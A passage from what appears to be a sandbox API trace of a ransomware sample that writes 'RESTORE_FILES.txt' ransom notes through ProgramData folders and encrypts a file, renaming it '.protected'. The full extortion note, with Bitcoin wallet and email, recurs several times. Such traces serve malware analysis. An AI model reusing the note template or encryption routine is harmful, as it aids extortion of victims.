SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.276] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.277] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.277] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.277] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.277] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.277] CloseHandle (hObject=0xd4) returned 1 [0071.277] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="Windows") returned -1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="Program Files") returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="Program Files (x86)") returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="$Recycle.bin") returned 1 [0071.277] lstrcmpiW (lpString1="Temp", lpString2="System Volume Information") returned 1 [0071.277] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned 45 [0071.277] lstrcmpW (lpString1="Temp", lpString2=".") returned 1 [0071.277] lstrcmpW (lpString1="Temp", lpString2="..") returned 1 [0071.277] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*") returned 47 [0071.277] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0x447cc0 [0071.278] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.278] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.278] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.278] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.278] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.278] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\.") returned 47 [0071.278] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.278] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 1 [0071.278] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.278] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.278] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.278] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.278] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.278] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\..") returned 48 [0071.278] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.278] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.278] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0071.278] FindClose (in: hFindFile=0x447cc0 | out: hFindFile=0x447cc0) returned 1 [0071.278] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt") returned 63 [0071.278] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\temp\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0071.401] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.401] WriteFile (in: hFile=0xd4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ec94*=0x53d, lpOverlapped=0x0) returned 1 [0071.401] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.401] WriteFile (in: hFile=0xd4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ec94*=0x2ac, lpOverlapped=0x0) returned 1 [0071.401] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.401] WriteFile (in: hFile=0xd4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ec94, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ec94*=0xb1, lpOverlapped=0x0) returned 1 [0071.402] CloseHandle (hObject=0xd4) returned 1 [0071.402] FindNextFileW (in: hFindFile=0x447c80, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0071.402] FindClose (in: hFindFile=0x447c80 | out: hFindFile=0x447c80) returned 1 [0071.402] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\RESTORE_FILES.txt") returned 58 [0071.402] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\data\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.403] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.403] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0071.404] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.404] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0071.404] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.404] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0071.404] CloseHandle (hObject=0xb4) returned 1 [0071.404] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0071.404] FindClose (in: hFindFile=0x47b7a8 | out: hFindFile=0x47b7a8) returned 1 [0071.404] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\RESTORE_FILES.txt") returned 53 [0071.404] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\RESTORE_FILES.txt" (normalized: "c:\\programdata\\microsoft\\search\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0071.404] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0071.405] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0071.405] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0071.405] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0071.405] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0071.405] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, lpOverlapped=0x0) returned 1 [0071.405] CloseHandle (hObject=0xa4) returned 1 [0071.405] FindNextFileW (in: hFindFile=0x494b80, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0071.405] lstrcmpiW (lpString1="User Account Pictures", lpString2="Windows") returned -1 [0071.405] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files") returned 1 [0071.405] lstrcmpiW (lpString1="User Account Pictures", lpString2="Program Files (x86)") returned 1 [0071.406] lstrcmpiW (lpString1="User Account Pictures", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1="User Account Pictures", lpString2="System Volume Information") returned 1 [0071.406] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures") returned 50 [0071.406] lstrcmpW (lpString1="User Account Pictures", lpString2=".") returned 1 [0071.406] lstrcmpW (lpString1="User Account Pictures", lpString2="..") returned 1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*") returned 52 [0071.406] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b7a8 [0071.406] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.406] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.406] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.406] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\.") returned 52 [0071.406] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0071.406] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.406] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0071.406] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0071.406] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0071.406] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\..") returned 53 [0071.406] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0071.406] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0071.406] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="Windows") returned -1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="Program Files") returned -1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="Program Files (x86)") returned -1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="$Recycle.bin") returned 1 [0071.406] lstrcmpiW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="System Volume Information") returned -1 [0071.406] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.406] StrStrIW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".protected") returned 0x0 [0071.406] lstrcmpW (lpString1="5p5NrGJn0jS HALPmcxz.dat", lpString2="RESTORE_FILES.txt") returned -1 [0071.406] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0071.406] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x447c80*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x447c80*, pdwDataLen=0x295f154*=0x30) returned 1 [0071.406] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0071.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.407] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".txt") returned 0x0 [0071.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.407] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".rar") returned 0x0 [0071.407] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat") returned 75 [0071.407] StrStrW (lpFirst="5p5NrGJn0jS HALPmcxz.dat", lpSrch=".zip") returned 0x0 [0071.407] ReadFile (in: hFile=0xb4, lpBuffer=0x49dc50, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesRead=0x295f174*=0x0, lpOverlapped=0x0) returned 1 [0071.407] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.407] WriteFile (in: hFile=0xb4, lpBuffer=0x49dc50*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x49dc50*, lpNumberOfBytesWritten=0x295f174*=0x0, lpOverlapped=0x0) returned 1 [0071.408] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0071.408] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0071.409] WriteFile (in: hFile=0xb4, lpBuffer=0x447c80*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447c80*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0071.409] CloseHandle (hObject=0xb4) returned 1 [0071.409] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.protected") returned 85 [0071.409] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\5p5NrGJn0jS HALPmcxz.dat.protected" (normalized: "c:\\programdata\\microsoft\\user account pictures\\5p5nrgjn0js halpmcxz.dat.protected")) returned 1 [0071.410] FindNextFileW (in: hFindFile=0x47b7a8, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="Windows") returned -1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files") returned -1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="Program Files (x86)") returned -1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="$Recycle.bin") returned 1 [0071.410] lstrcmpiW (lpString1="Default Pictures", lpString2="System Volume Information") returned -1 [0071.410] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures") returned 67 [0071.410] lstrcmpW (lpString1="Default Pictures", lpString2=".") returned 1 [0071.410] lstrcmpW (lpString1="Default Pictures", lpString2="..") returned 1 [0071.410] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*") returned 69 [0071.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*", lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0x447c80 [0071.480] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0071.480] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0071.480] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0071.480] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0071.480] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0071.480] wnsprintfW (in: pszDest=0x4695e0, 